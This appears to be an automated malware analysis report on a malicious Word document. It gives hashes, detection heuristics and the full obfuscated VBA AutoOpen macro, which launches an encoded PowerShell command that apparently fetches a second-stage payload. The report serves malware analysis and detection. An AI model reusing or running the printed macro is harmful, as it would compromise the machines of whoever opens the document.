Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 80f7dc1b6fc97bce…

MALICIOUS

Office (OLE)

107.5 KB Created: 2018-06-12 16:57:00 Authoring application: Microsoft Office Word First seen: 2018-07-04
MD5: 8403917fe2e4c330468b6c53941a6705 SHA-1: 899d945883c041424f8992f3b12f9916963727bd SHA-256: 80f7dc1b6fc97bcefecdf603b126715e074e6dca832a286cb10f7de6ba07f268
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains VBA macros, including an AutoOpen subroutine, which is a common technique for initial execution in malicious documents. The critical heuristic firing for Shell() call in VBA, combined with the critical ClamAV detection, indicates the macro is designed to execute a command. The script attempts to construct a command line that includes 'powershell.exe', suggesting it downloads and executes a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6582733-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6582733-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    kphAm = Tan(18752)
YVSaMwprp = PQXYU + Shell(wUYPirUEHzj + Chr(jYjlQOo + vbKeyP + OnWzJaIkz) + "owers" + lwYWqPK + cGAOOW + hUPvhqRSlZ + NZCjzLtKR + bJWklbffJkO + NfkhASQMB, 74929 - 74929)
sNIZAV = Tan(78284)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub Autoopen()
On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14354 bytes
SHA-256: 489464b6f857951377de58ae34b851b6917248275d23dbcb6651f85796e5d0a7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
296 of 589 identifiers look randomly generated (e.g. 'ZgBMAEEAdABlAFM') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dZYNlkqmVlnSTo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YVSaMwprp()
On Error Resume Next
dkCXw = Tan(39429)
OsMHK = IfYHXt
rDJcfm = CDbl(VcnRVj)
JNwur = wlqzC
lXnJiO = Hex(BZZbZ * ChrW(LfhlFv + Int(bozRZM * Rnd(60803)) * oFNKa * Log(64638 * RhTFD - hhjmY + Fix(51))))
frOzl = Tan(8130)
WzXVj = Tan(41638)
fNTMRz = LOASz
QtHQfB = CDbl(ziaFc)
JLDtL = jUpUNW
ZrUdO = Hex(lMAcpH * ChrW(iLjAnN + Int(LqzHUo * Rnd(64812)) * XaYtt * Log(21285 * SiBLXr - IiOlVC + Fix(51))))
kphAm = Tan(18752)
YVSaMwprp = PQXYU + Shell(wUYPirUEHzj + Chr(jYjlQOo + vbKeyP + OnWzJaIkz) + "owers" + lwYWqPK + cGAOOW + hUPvhqRSlZ + NZCjzLtKR + bJWklbffJkO + NfkhASQMB, 74929 - 74929)
sNIZAV = Tan(78284)
DvOiG = EwbptR
QtjSfs = CDbl(lrtGBs)
RtlXWE = iSXqvf
qGKtsB = Hex(UYGUcC * ChrW(MBHdNS + Int(FpRXMw * Rnd(72136)) * McjMGv * Log(70982 * NIrwwU - CtCuSQ + Fix(51))))
NhNsl = Tan(31402)
End Function
Sub Autoopen()
On Error Resume Next
WfCqtM = Tan(59333)
QvsbSu = WUqkL
dJDTK = CDbl(OBzNKU)
rdoHDI = RdHCqz
sLsBA = Hex(dsWwX * ChrW(PPjQih + Int(bCrhM * Rnd(75712)) * LzACBd * Log(24841 * WqGLJP - wGqkU + Fix(51))))
jiMZVi = Tan(42803)
YVSaMwprp
BdjOZ = Tan(88014)
rUztVn = sJWXrO
krbSi = CDbl(Oodfuq)
VNazk = jHmtq
FqpCCz = Hex(IOQlFw * ChrW(SRDrRz + Int(fYfjZm * Rnd(42661)) * wwwkTd * Log(71143 * laiDi - FbUBuD + Fix(51))))
EvbrU = Tan(49948)
End Sub


Attribute VB_Name = "JTdLUaSRn"
Function lwYWqPK()
On Error Resume Next
OdjKzq = Tan(44865)
GLqTp = WSBqYV
GYRzt = CDbl(Gsqfrv)
JNbAzC = jwRpV
fGBXE = Hex(rWIERM * ChrW(wRRQf + Int(XthIrB * Rnd(82643)) * CbJGc * Log(53810 * OzrTbu - ZBIKn + Fix(51))))
FCRjmp = Tan(96597)
IknVAzA = "HeLL -e IAAoAC" + "AAT" + "gBlAHcALQBvAEI" + "AagBFAGM" + "AVAAgACAAUw" + "BZAHMAVA"
zzKVN = Tan(50165)
vwwokY = SawDFT
fAjNv = CDbl(AJdUn)
LQBjzN = PdCKW
WXkrj = Hex(jizRzd * ChrW(SIplV + Int(AHNRQt * Rnd(98108)) * lEqdqK * Log(21078 * uQRtm - wLwED + Fix(51))))
vLZsjj = Tan(41514)
lfPiRXlU = "BFAG0A" + "LgBpAG" + "8ALg" + "BjAG8AT" + "QBwAFIARQBzA" + "FMASQBPAG" + "4ALgBkAGUA"
JFTwks = Tan(96853)
JoGSzt = ZUcrw
CSMpJ = CDbl(ZiwwJo)
PowTI = FYBKzk
CwAXEp = Hex(nHmGI * ChrW(wYvKsw + Int(iiacAT * Rnd(94338)) * jAIPFR * Log(84293 * darUQb - BqLhw + Fix(51))))
crRAGJ = Tan(46536)
ULHkUvcWvaI = "ZgBMAEEAdABlAFM" + "AVABSAGUAQQ" + "BNAC" + "gAWwBzAFkA" + "Uw" + "B0AG" + "UA" + "bQAuAEkAT"
YXlsh = Tan(7337)
irCJG = SkAcNG
ZlplA = CDbl(HJqOw)
THFDG = jXAXzI
plKGR = Hex(sDBzm * ChrW(zrWwzn + Int(DBmoMh * Rnd(89060)) * iiVBm * Log(62584 * LYwCZ - GERJSU + Fix(51))))
kMbCk = Tan(44692)
TmNDG = "wA" + "uA" + "G0ARQBtAE" + "8AcgB5AHMAVABy" + "AGUAYQBNAF0AI"
XDzzZ = Tan(44495)
NVjvA = ljzzv
lzwUi = CDbl(MnPSGS)
PbqHa = dCSsil
SSUEO = Hex(HWlHai * ChrW(DMjIv + Int(NdkZv * Rnd(47419)) * ASLSE * Log(26682 * PbuSKD - LvdUQZ + Fix(51))))
wQSJz = Tan(39217)
szQIo = "AB" + "bA" + "HMAWQBzAFQA" + "RQBNAC4"
kisZf = Tan(84645)
pKTCMz = bSQws
CiHFfz = CDbl(EBsIH)
LitBti = DVkJS
ZDUwB = Hex(FlVCa * ChrW(tjcXoS + Int(vToZi * Rnd(32792)) * Thfjw * Log(95106 * cZMjCq - CIpcSN + Fix(51))))
wijhRw = Tan(44191)
iniWnZjk = "AQwBvAG4AVgBlA" + "FIAVABdADoAOg" + "BGAFI" + "AbwBt" + "AEIAQQBzAGUANgA" + "0AHMAVAByAEkATg" + "BnACgAIAAnAFYA"
lilhis = Tan(46159)
pDdAR = QnlbO
KwwPDX = CDbl(wwzjw)
roizV = DiCAY
NhsSsv = Hex(kiZmhW * ChrW(GYZGpX + Int(kaRipQ * Rnd(28569)) * OHwYa * Log(81403 * cjFDqO - RBAbrG + Fix(51))))
EwKBKc = Tan(14479)
zOzdUSdz = "WgBCAG" + "IAVAA4AEoAQQB" + "FA" + "EkAWAAv" + "AHkAagA0A" + "DAASwBVAF" + "QAWgAxAGk" + "AQgA0AGEA"
jDfbZP = Tan(35030)
IwnQvt = mhQwI
hOZIf = CDbl(LoWPO)
CwCYOo = zOrfD
jKvXUu = Hex(wKCpFS * ChrW(FGzmjZ + Int(tzzNSc * Rnd(54600)) * CpiVS * Log(91552 * PQCVkj - uNSvtQ + Fix(51))))
OFwdIp = Tan(26121)
ZLEPSIU = "VQB4AEUASwBWA" + "DQAaABhAEEAMw" + "A0AFkARwBLADI" + "AeQA5AGc" + "AdQBiAEg" + "AZgByAG" + "QAdQBnA" + "GwAaABQA"
KBRBpH = Tan(23896)
kzzGr = jLpzBD
vXjLQn = CDbl(ksKFlR)
BDjtk = HivuKB
WmoKnK = Hex(OiipZ * ChrW(cVspt + Int(ZciIF * Rnd(7772)) * VcNbo * Log(1592 * HNzDA - bDrXU + Fix(51))))
UPFlqG = Tan(1986)
fXwUc = "C8AdQB" + "xAHAA" + "agBJAHkAeQBRA" + "HoA" + "OAA4AD"
bDoijG = Tan(42338)
kBCtoJ = OXoob
VkKnLj = CDbl(QrXVn)
nEZTU = wmTqUb
LCqNB = Hex(ZvFSd * ChrW(XWTYti + Int(FdVIpE * Rnd(39576)) * fHCuqL * Log(12423 * zZdVC - Pimvd + Fix(51))))
XcOZLn = Tan(42030)
GdXCjtqsVwq = "AANQBtAGU" + "ATgBVAE4AOAB0A" + "DgAUABpA" + "FUAWA" + "BSAEUASABWA" + "DAAZgBFAFMATw" + "BCAEwARAA"
lwYWqPK = IknVAzA + lfPiRXlU + ULHkUvcWvaI + TmNDG + szQIo + iniWnZjk + zOzdUSdz + ZLEPSIU + fXwUc + GdXCjtqsVwq
End Function
Function cGAOOW()
On Error Resume Next
puBJjY = Tan(90179)
DXniRw = wQIir
nWtbX = CDbl(CsdjC)
iiFYTp = TafOIw
ZIQIDI = Hex(NBYHiI * ChrW(svZok + Int(mPOZwT * Rnd(1032)) * nIHkc * Log(85676 * ucUftL - hhRkj + Fix(51))))
afFaXJ = Tan(86947)
QUwUUrDJ = "xAEUASgBuAGcAYQ" + "BPAEcA" + "awA5AG4" + "AO" + "QA3AGYANAB1A" + "GEAZwB" + "xAEUA"
tqLjI = Tan(10954)
sQWFQG = TEIrcU
hIMmZz = CDbl(DhNTz)
BlIvlG = oQuiQU
LARjjY = Hex(LizzjI * ChrW(pjJmQ + Int(whvMG * Rnd(43503)) * uRNhWE * Log(39645 * CPjmaM - CJwCwZ + Fix(51))))
jkszCj = Tan(58448)
DiutWi = "agBF" + "ADQ" + "AQQA2AFIAeg" + "Bp" + "AGEAeQBsA" + "EEAWQBlA" + "EE" + "ATQ" + "Ba"
FZKvj = Tan(88814)
SainW = UcApGH
mNEYEv = CDbl(doXCoR)
KHcfjv = rYXKCL
HsJwZ = Hex(SrVlqk * ChrW(rdDbz + Int(pJVXK * Rnd(49812)) * zvpjN * Log(2972 * XVwNGP - fSlqp + Fix(51))))
lqNVvL = Tan(96573)
mXUwaZWi = "AGwA" + "cABtAGsAUw" + "BYAGQ" + "ARgBEAEUALwA5AD" + "cAeQBxAHE"
DlUzW = Tan(25602)
WCoXp = mVjpV
mKrkhV = CDbl(aHiTlC)
PUkcO = BPIPwS
uzUjfZ = Hex(LKLBmi * ChrW(nvoiDV + Int(lSlEbl * Rnd(65711)) * CbnOV * Log(69274 * mBoLar - Ijpks + Fix(51))))
UThtw = Tan(26961)
sniNCF = "AaQBnA" + "HIAbQBjAEoATwBz" + "ADAANgBvAFcAWAB" + "1AEQ"
hjcDo = Tan(87420)
IkNXIH = Intsv
jJCOrs = CDbl(CiuuS)
auDYk = hCvYV
blCLf = Hex(ABTcXh * ChrW(Mvama + Int(SFBjRF * Rnd(28387)) * VOrll * Log(62410 * PHQqCG - QnzWWK + Fix(51))))
bGQVi = Tan(5378)
oMEzzZbGUrr = "AOABqAFQAMAB3" + "AHkAYQBaA" + "GUAcABmAC8ARQ" + "BGAEMASgBGAEUAW" + "ABLAHIAUQ"
aElGR = Tan(57949)
mcrmAS = oJvXjY
NjvjEl = CDbl(HbPCdj)
DfklcP = LGkVra
zUwziY = Hex(VqWMs * ChrW(fAbkWj + Int(kiLlG * Rnd(17876)) * CcKNM * Log(20679 * KGRDz - choNY + Fix(51))))
fwKiAw = Tan(16717)
lszAtvVVD = "BpA" + "FkAYgB5AHcAcwB" + "lADUATQBaAD" + "MA"
cGAOOW = QUwUUrDJ + DiutWi + mXUwaZWi + sniNCF + oMEzzZbGUrr + lszAtvVVD
End Function
Function hUPvhqRSlZ()
On Error Resume Next
CSJMs = Tan(39919)
JsfJA = cUtJjX
iCqzM = CDbl(dLszK)
DsFrz = KizTp
EYBDd = Hex(UTbkn * ChrW(cMzWqC + Int(uUuwp * Rnd(43895)) * wEWsaL * Log(26025 * soUahb - rnTEFP + Fix(51))))
GonvBu = Tan(78180)
zBzQNNO = "MgBPADYAZg" + "BYADgAQg" + "B5AEkAU" + "wBrAFgARwBmAG" + "UAYwAxADMANw" + "AvA" + "HIA"
cLjBU = Tan(31360)
iKblvT = BQUqR
GdlQNK = CDbl(hEiKTs)
MIujHM = EIcUUR
nXaLcL = Hex(waPnJ * ChrW(PifRS + Int(lwsWo * Rnd(66818)) * iBUJw * Log(87124 * DuhEwq - iNiisz + Fix(51))))
iadKBQ = Tan(61533)
zUDFSi = "UQAz" + "AHcAUA" + "BHACsARQBC" + "AHAAV"
uBmcXc = Tan(3759)
RSuPOV = bTcWHk
rvkKE = CDbl(rwvcNG)
jRVTEc = RLwijJ
BrZuYM = Hex(JrsMYa * ChrW(SXRCHV + Int(JzISi * Rnd(812)) * jwCivz * Log(80130 * WiouO - adHfB + Fix(51))))
wojfYn = Tan(25033)
TRdJjY = "wBnAH" + "EAVABGADIA" + "cQB1AF" + "AASABwA" + "HUASAArAFMATAB" + "iADMAN" + "QB0AEUAcQBF" + "AHoASABR"
tQbuLs = Tan(55331)
piddwL = jNNHt
TBmcCu = CDbl(QXFHkz)
FHuiW = joYCXB
mzRLfT = Hex(ZPoRJ * ChrW(kiScVt + Int(zvcTil * Rnd(98754)) * fckEA * Log(14509 * SFubQ - nqScZY + Fix(51))))
CVwji = Tan(4653)
UbuKZiBr = "AGoAYgBzAFIAM" + "AB" + "lAGUAeABWA" + "GYARgB" + "pAGkAMQ" + "A3AGoANQA1AEw" + "AbwAxAHcASwBiA" + "EwAbQBYAGIAd"
rVzjuT = Tan(13455)
mDMIqf = MhtcL
FJqFM = CDbl(AJjDaw)
OzHOj = jtDOQQ
iqIOmC = Hex(ilLGbi * ChrW(GkGzlK + Int(QNFTM * Rnd(60627)) * QCuaoi * Log(21377 * ARQYH - dlAmwS + Fix(51))))
JwOiG = Tan(20430)
pWfcHz = "ABzACsAW" + "ABiA" + "EgAWAAwAGE" + "AZAA5AHgA" + "ZgB" + "tAE4AaABpAHEA" + "bwBzAFgA" + "VgAwAFMA" + "UABvAG4AcA" + "AzADcAMwAy"
cDuaW = Tan(23593)
iRjmD = zjpjN
jncEj = CDbl(MEHGf)
hTzjzW = BvauUU
vzcZH = Hex(QDbZAw * ChrW(MJHGc + Int(kFjVRm * Rnd(35049)) * MHJtHk * Log(62591 * NchwA - isYfwI + Fix(51))))
rnTSjj = Tan(90334)
zHuSSz = "AEIATA" + "B4AHcAMQBNAHA" + "Adg" + "BnAEYAUQA1AGI" + "AawBOA"
dLnpn = Tan(8505)
RjsOht = fYdlFb
zloJNU = CDbl(pbYBl)
kQuJM = iarmja
vIvowi = Hex(UfZzf * ChrW(kbcEU + Int(wmLOi * Rnd(38577)) * isQFw * Log(8017 * cYLuna - RmEqv + Fix(51))))
mqGwnS = Tan(43785)
RrjnphRNnu = "EkAeQBjAEgAeABI" + "ADEAeg" + "BiAGYAMAA3A" + "HQAagAyAEYARwB"
wkuQUZ = Tan(98862)
Eabuwz = PhRuq
AHXipm = CDbl(mRSjhE)
oRdSAX = hiPAho
qQVXjA = Hex(cWiinL * ChrW(mHvNsU + Int(wEztS * Rnd(76670)) * dHiIz * Log(16623 * BwIAEi - vvoNM + Fix(51))))
uWUmp = Tan(39599)
jZKSzmAC = "0AHoA" + "ZwBRA" + "HgAdABn" + "AFA" + "ARwAw" + "ADUASgBR" + "AC8ASAB"
sMWiO = Tan(23482)
zOzVqC = lKmMnp
DIKfG = CDbl(XGnvTc)
Eoadm = wMjvSX
KJLha = Hex(iwoDL * ChrW(HaIsbE + Int(NCnzk * Rnd(16599)) * vrwXMs * Log(15660 * bOvFVR - EPlOfi + Fix(51))))
pUErP = Tan(19063)
NZNjbraafA = "kADAAUQBvAHMAb" + "wB" + "1AHEAdgBVAEgAVA" + "BiAE" + "gAWQBKADAANgBHA" + "HUAbABOAFIAcwBN" + "AFIASQBTAGQAaQ" + "B4ADkA"
hUPvhqRSlZ = zBzQNNO + zUDFSi + TRdJjY + UbuKZiBr + pWfcHz + zHuSSz + RrjnphRNnu + jZKSzmAC + NZNjbraafA
End Function
Function NZCjzLtKR()
On Error Resume Next
WLaZz = Tan(10978)
zRqTqK = twVilP
YLWdvi = CDbl(iSVdw)
ECUjVL = Gzuuo
SvXiI = Hex(tIzAEv * ChrW(blSzV + Int(sUurcp * Rnd(25314)) * FraRb * Log(78955 * MFHjMw - hGCQk + Fix(51))))
kYnwZ = Tan(8887)
VHACQUpi = "MABSAEUAYQB" + "vAFoASgBXACsANQ" + "BEADgAVwByAG" + "EAR" + "ABD"
zXEvtv = Tan(9489)
RXidGc = jLPIr
nnoMEv = CDbl(hEcsWt)
oBLqRt = QjUmd
VsbiQN = Hex(MjPjo * ChrW(QGMupG + Int(AaiAZ * Rnd(82685)) * YXDUZa * Log(13401 * pcubJ - QElcCR + Fix(51))))
JDpijQ = Tan(77581)
QUlmvUwY = "AEoAbgBC" + "AHoA" + "dABSAG8ARABrAF" + "cAeABtAHcAYQ" + "B4AHQ" + "AVgBnAEYAVwA4AD" + "YAUQBwADUAdgB" + "LAEMASQ"
NbJZPj = Tan(79029)
vJNswR = zOwckV
XWZUPT = CDbl(qsKSY)
BlBuBb = qSpYj
SpPkoE = Hex(UDmAv * ChrW(VRFRC + Int(YqjOMC * Rnd(51051)) * zCEhA * Log(75378 * AYaIW - zGzwB + Fix(51))))
hFGlBm = Tan(97500)
lQRppJ = "BS" + "AE8AcQBnAHM" + "AawB6AGoAc" + "wBOAGEAdwA0ADUA" + "QwBxADMAbwA" + "yAEIANgB3AEIASQ" + "BMAHQAOQBn"
AjbDi = Tan(26208)
cSzFzI = UtiIjL
klQLC = CDbl(DqQCvB)
WQzWaI = WnwtB
klMGtF = Hex(iQwKsf * ChrW(rlBwJ + Int(dZDwHi * Rnd(45689)) * CwnXJL * Log(17763 * dKJpO - GSmiuo + Fix(51))))
lmBjDN = Tan(19753)
FBlKTrXK = "AHMAPQAnA" + "CA" + "AKQ" + "AgACwA" + "IAB" + "bAEkAbwAuAGM" + "ATwBNAFAAUgBFAF"
QwKivj = Tan(38100)
niTKY = rnUjh
kJdnj = CDbl(RKmnG)
wlNLwH = PmHzv
dDduOO = Hex(jqwGV * ChrW(wjPJY + Int(cWLnuj * Rnd(77592)) * QSjcK * Log(65682 * FLnPX - mRIoG + Fix(51))))
bInzdj = Tan(617)
ihbPcaHOzPj = "MAcwBJAG" + "8ATgAuAE" + "MATwBNAH" + "AAcgBFAHMA" + "UwBpAG8"
NZCjzLtKR = VHACQUpi + QUlmvUwY + lQRppJ + FBlKTrXK + ihbPcaHOzPj
End Function
Function bJWklbffJkO()
On Error Resume Next
ERQjO = Tan(49819)
DOKTw = KtUctA
qFDzop = CDbl(EcSDt)
PHovE = zXiCz
JDRPS = Hex(jiacz * ChrW(RuYNw + Int(wHZnXC * Rnd(9631)) * XsCCI * Log(4974 * iimup - uTLjn + Fix(51))))
aiJck = Tan(51269)
SEwnOPBd = "ATgBtAE8AZABFAF" + "0AOgA6AEQAZQ" + "BjA" + "G8ATQB" + "wAFIA" + "ZQBTA"
GqvWf = Tan(29347)
tzrfX = zHmPm
HRBoO = CDbl(kuivO)
SbBwQ = IGffRu
fLTKTr = Hex(pRTpEC * ChrW(SvUfzl + Int(MvSAqD * Rnd(14173)) * ncAHMi * Log(84065 * jKEUa - ILrOC + Fix(51))))
LKzTJB = Tan(36409)
MPBKz = "FMAKQB8ACU" + "AIAB7AE4" + "AZQ" + "B3AC0Ab"
BKcnm = Tan(19148)
rpzpzb = lUtQAM
GIcARU = CDbl(cjzLPb)
ZiQiQ = RVuYF
fYiZs = Hex(GcvBz * ChrW(UpBOJz + Int(hzRMmd * Rnd(66627)) * pVkOEv * Log(6363 * DwHFKJ - TXidNb + Fix(51))))
CMvtY = Tan(28817)
KBzGm = "wBCAGoARQBj" + "AFQAIAAgAGkAT" + "wAuAH" + "MAVABSAEUA" + "YQ"
MswJR = Tan(32711)
KnurR = wQBuU
AzpDz = CDbl(HVTYS)
XoarF = vssrI
omwbVm = Hex(BYzOQ * ChrW(owoJv + Int(lUjUcZ * Rnd(12740)) * qwcjI * Log(78531 * PNYjz - ORnXZJ + Fix(51))))
QOGjw = Tan(8278)
ozTGAtzpJ = "BNAFIARQBhAGQA" + "ZQBSAC" + "gAIAAkA" + "F8AI" + "AAsACA" + "AW" + "wB0AE" + "UAWAB0AC4ARQB"
PERTB = Tan(29542)
TCwTFb = ZiQcv
XCwwD = CDbl(mucrt)
ERpKvF = kFuPqE
hCrjq = Hex(BzzMI * ChrW(Qkdhr + Int(DkBKc * Rnd(28409)) * KzLAdn * Log(10307 * iijCwA - iGScCa + Fix(51))))
uHYCDn = Tan(38307)
iZfRwjO = "OAEMATwBkAG" + "kATgBHAF0AOgA6" + "AEEAUwB" + "DAGkASQAgACkAfQ"
XZctj = Tan(17780)
zWZDch = tivKQ
usAMM = CDbl(CEbaj)
YPLKa = UdsJw
zzHsN = Hex(HtXSXf * ChrW(QjKGl + Int(vplDR * Rnd(81445)) * EsqmJl * Log(92598 * NOOJqh - quGsj + Fix(51))))
JWKWHn = Tan(482)
nAzLXZUzJFj = "B8ACUAe" + "wAkAF8AL" + "gBSAEUAYQBEA" + "FQATwBF" + "AG4AZ" + "AAoACAAKQAg"
bJWklbffJkO = SEwnOPBd + MPBKz + KBzGm + ozTGAtzpJ + iZfRwjO + nAzLXZUzJFj
End Function
Function NfkhASQMB()
On Error Resume Next
NtpCi = Tan(80559)
CkJmi = CRwzuo
zrzZJz = CDbl(VjQBwv)
zUYHLr = nJzFz
HENZM = Hex(XNWwQs * ChrW(vtWUHo + Int(qDwXqi * Rnd(93724)) * LhATL * Log(73657 * QSrpwY - cYIOi + Fix(51))))
JQpqRK = Tan(39625)
lVjKDUP = "AH0AIAApAH" + "wAIAAuACAAKAA" + "gACQAdgBFA" + "FIAYgBvAFMAZQB" + "QAHIAZ" + "QBmAGUA" + "UgBlAE4AYwBl" + "AC4" + "AdABPAFMA"
IqidC = Tan(95564)
pwwjv = cEcRp
TaYPc = CDbl(APvrJ)
BRjIb = MwaUn
LhjojM = Hex(YbwBc * ChrW(aGYBhG + Int(mufdYU * Rnd(55314)) * Ftnwn * Log(92715 * uVMij - laEQHY + Fix(51))))
BnutN = Tan(79132)
SGoVaV = "VAByAGkAT" + "gBnA" + "CgAKQB" + "bADEA"
RCFPMj = Tan(85818)
iJCon = MDpwX
ATaMQ = CDbl(bSSzul)
GmsPwW = lSrvOS
dpjEup = Hex(ozbsz * ChrW(HZAjO + Int(qjkTo * Rnd(85714)) * Yhibfw * Log(96735 * zdjuA - dRoRWz + Fix(51))))
sLSIj = Tan(95864)
kzMAjOjw = "LAA" + "zAF0AKwAn" + "AFgAJwAtAGo" + "Abw" + "BpA"
EtVvMR = Tan(34034)
GVvuAH = wQoOV
OvCRv = CDbl(fWPTw)
WFEHo = idpLTV
wziOBT = Hex(cOpzT * ChrW(RulRqC + Int(uiCEpc * Rnd(12894)) * rXDchp * Log(97032 * zHOzjX - PGoKQ + Fix(51))))
rYUQXh = Tan(34568)
qOwqmEonGkU = "E4A" + "JwAnAC" + "kA"
NfkhASQMB = lVjKDUP + SGoVaV + kzMAjOjw + qOwqmEonGkU
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.